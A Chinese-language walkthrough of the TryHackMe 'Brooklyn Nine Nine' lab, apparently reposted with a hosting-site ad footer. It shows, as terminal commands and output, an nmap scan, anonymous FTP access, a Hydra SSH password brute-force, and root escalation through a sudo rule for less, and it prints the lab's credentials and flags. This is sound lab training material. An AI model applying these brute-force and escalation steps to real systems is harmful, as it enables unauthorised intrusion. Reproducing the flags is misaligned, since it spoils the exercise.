【Tryhackme】Brooklyn Nine Nine(ftp匿名登录,ssh爆破,less提权)
服务发现
┌──(root?kali)-[~/tryhackme] └─# nmap -sV -Pn 10.10.60.116 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-24 05:20 EDT Nmap scan report for 10.10.60.116 Host is up (0.34s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds
匿名登录FTP服务
┌──(root?kali)-[~/tryhackme/brooklyn] └─# ftp 10.10.60.116 Connected to 10.10.60.116. 220 (vsFTPd 3.0.3) Name (10.10.60.116:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt 226 Directory send OK. ftp> get note_to_jake.txt local: note_to_jake.txt remote: note_to_jake.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes). 226 Transfer complete. 119 bytes received in 0.06 secs (1.9443 kB/s)
下载了一个note_to_jake.txt
文件
查看文件
┌──(root?kali)-[~/tryhackme/brooklyn] └─# cat note_to_jake.txt From Amy, Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine
简直是邀请我们破解他的ssh密码,hydra破解之
┌──(root?kali)-[~/tryhackme/brooklyn] └─# hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.60.116 ssh -t 20 -v 130 ⨯ Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-24 05:26:34 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 20 tasks per 1 server, overall 20 tasks, 14344399 login tries (l:1/p:14344399), ~717220 tries per task [DATA] attacking ssh://10.10.60.116:22/ [VERBOSE] Resolving addresses ... [VERBOSE] resolving done [INFO] Testing if password authentication is supported by ssh://jake@10.10.60.116:22 [INFO] Successful, password authentication is supported by ssh://10.10.60.116:22 [ERROR] could not connect to target port 22: Socket error: Connection reset by peer [ERROR] could not connect to target port 22: Socket error: Connection reset by peer [ERROR] ssh protocol error [ERROR] ssh protocol error [ERROR] could not connect to target port 22: Socket error: Connection reset by peer [ERROR] ssh protocol error [ERROR] could not connect to target port 22: Socket error: Connection reset by peer [ERROR] ssh protocol error [22][ssh] host: 10.10.60.116 login: jake password: 987654321 [STATUS] attack finished for 10.10.60.116 (waiting for children to complete tests)
爆出密码jake:987654321
在/home/holt
目录找到user.txt
┌──(root?kali)-[~/tryhackme/brooklyn] └─# ssh jake@10.10.60.116 The authenticity of host '10.10.60.116 (10.10.60.116)' can't be established. ECDSA key fingerprint is SHA256:Ofp49Dp4VBPb3v/vGM9jYfTRiwpg2v28x1uGhvoJ7K4. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.60.116' (ECDSA) to the list of known hosts. jake@10.10.60.116's password: Last login: Tue May 26 08:56:58 2020 jake@brookly_nine_nine:~$ ls jake@brookly_nine_nine:~$ whoami jake jake@brookly_nine_nine:~$ pwd /home/jake jake@brookly_nine_nine:~$ cd .. jake@brookly_nine_nine:/home$ ls amy holt jake jake@brookly_nine_nine:/home$ cd amy jake@brookly_nine_nine:/home/amy$ ls jake@brookly_nine_nine:/home/amy$ cd ../holt/ jake@brookly_nine_nine:/home/holt$ ls nano.save user.txt jake@brookly_nine_nine:/home/holt$ cat user.txt ee11cbb19052e40b07aac0ca060c23ee
sudo -l查看超级权限,可以使用less
jake@brookly_nine_nine:/home/holt$ sudo -l Matching Defaults entries for jake on brookly_nine_nine: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin User jake may run the following commands on brookly_nine_nine: (ALL) NOPASSWD: /usr/bin/less
提权到root
jake@brookly_nine_nine:/home/holt$ sudo less /etc/profile # id uid=0(root) gid=0(root) groups=0(root) # cat /root/root.txt -- Creator : Fsociety2006 -- Congratulations in rooting Brooklyn Nine Nine Here is the flag: 63a9f0ea7bb98050796b649e85481845 Enjoy!! #
[温馨提示:高防服务器能助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。]
[图文来源于网络,不代表本站立场,如有侵权,请联系高防服务器网删除]